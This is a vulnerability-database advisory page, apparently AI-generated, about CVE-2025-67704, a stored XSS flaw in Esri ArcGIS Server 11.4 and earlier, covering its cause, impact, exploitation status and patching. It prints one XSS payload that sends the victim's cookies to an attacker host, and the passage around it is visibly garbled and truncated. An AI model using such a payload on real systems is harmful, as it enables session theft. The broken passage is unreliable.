
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2025-67704 is a stored cross-site scripting (XSS) vulnerability in Esri ArcGIS Server 11.4 and earlier (versions 10.9.1 through 11.4) on both Windows and Linux platforms. In certain configurations, a remote unauthenticated attacker can upload or store files containing malicious code that subsequently executes in the browser context of a victim who views the affected content. The vulnerability was published on December 31, 2025, and a patch was made available in January 2026. It carries a CVSS v3.1 base score of 6.1 (Medium) (Esri Advisory, ENISA EUVD).
The root cause is improper neutralization of user-supplied input during web page generation (CWE-79), specifically in the stored XSS variant (CAPEC-592). An unauthenticated remote attacker can, under certain ArcGIS Server configurations, upload or store files containing malicious scripts to the server. When a victim's browser subsequently loads or renders the stored content, the malicious code executes in the victim's browser context within the scope of the ArcGIS Server web application. The attack requires no privileges and has low complexity, though it does require user interaction (a victim visiting or triggering the stored content) (Esri Advisory, ENISA EUVD).
Successful exploitation results in limited but meaningful confidentiality and integrity impacts within the victim's browser session — an attacker can steal session tokens, cookies, or other sensitive data accessible to the browser, and can perform unauthorized actions on behalf of the victim within the ArcGIS Server application. The changed scope (S:C) indicates the impact extends beyond the vulnerable component itself to the victim's browser environment. Availability is not directly impacted. The risk is particularly relevant in environments where ArcGIS Server is exposed to untrusted users or the internet (Esri Advisory, ENISA EUVD).
No public proof-of-concept exploit code or evidence of active in-the-wild exploitation has been reported as of the time of this report. The EPSS score is approximately 0.04%, indicating a low probability of exploitation in the near term. The vulnerability is not listed in CISA's Known Exploited Vulnerabilities (KEV) catalog. No threat actor attribution has been identified (Feedly, ENISA EUVD).
<script>document.location='https://attacker.com/steal?c='+document.cookie</script>) designed to execute in a victim's browser..html, .js, or other script-capable extensions in unexpected directories.Esri has released the ArcGIS Server Security 2025 Update 2 Patch to address this vulnerability; administrators should apply this patch immediately to all affected ArcGIS Server instances (versions 10.9.1 through 11.4) on both Windows and Linux (Esri Advisory). As a configuration-based workaround, administrators should review and restrict ArcGIS Server configurations that allow unauthenticated file uploads or storage of user-supplied content, limiting such capabilities to authenticated and authorized users only. Additionally, deploying a web application firewall (WAF) with XSS filtering rules can help reduce exposure until patching is complete.
The vulnerability received limited but notable coverage from security aggregators and community platforms shortly after its December 31, 2025 disclosure. Security blogs such as Infinit Security published dedicated write-ups on the vulnerability (Infinit Security), and it was tracked by ENISA's European Vulnerability Database and INCIBE-CERT (INCIBE). No significant controversy or widespread social media discussion has been observed beyond standard CVE tracking and aggregation activity.
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."